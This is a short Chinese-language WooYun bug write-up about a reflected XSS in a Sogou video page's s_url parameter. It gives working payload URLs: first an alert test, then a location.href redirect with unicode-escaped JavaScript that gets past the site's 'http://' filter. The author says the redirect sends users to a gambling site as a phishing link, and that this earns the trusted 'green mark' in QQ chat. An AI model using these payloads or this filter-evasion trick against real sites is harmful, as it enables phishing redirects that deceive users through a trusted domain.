WooYun.org

在乌云看到这样一个例子：http://wooyun.org/bugs/wooyun-2010-048040
心想找个搜狗的搜索xss 应该能换个邀请码了吧？
找到如下url地址：
http://v.sogou.com/vc/topic.jsp?s_url=[内容可控]
通过一些方法绕出了js
通过一些fuzz测试之后。
http://v.sogou.com/vc/topic.jsp?s_url=http://baidu.com%22}%0aalert(1)%0a//
成功弹出：alert

挺有意思，那么我们试试直接通过location.href的方式跳转看看能不能绿标
构造如下代码:
http://v.sogou.com/vc/topic.jsp?s_url=%22}%0alocation.href=%22http://www.phpbug.cn%22%0a//
很是遗憾，竟然没有绿标

通过fuzz之后发现 凡是带有http:// 均会检测，并且拦截一次。
http:/ 不拦截
回到上面的xss，既然知道这样的特性，我们可以利用js转码。
将网页转码之后跳转到我们的钓鱼网站不就完成了吗？
在百度搜了一个菠菜网站：http://www.131333.com/
通过js转码之后加入我们的url
最后生成url地址：
http://v.sogou.com/vc/topic.jsp?s_url=%22}%0alocation.href=%22\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u0031\u0033\u0031\u0033\u0033\u0033\u002e\u0063\u006f\u006d%22%0a//
回到QQ聊天窗口，这个时候已经绿标。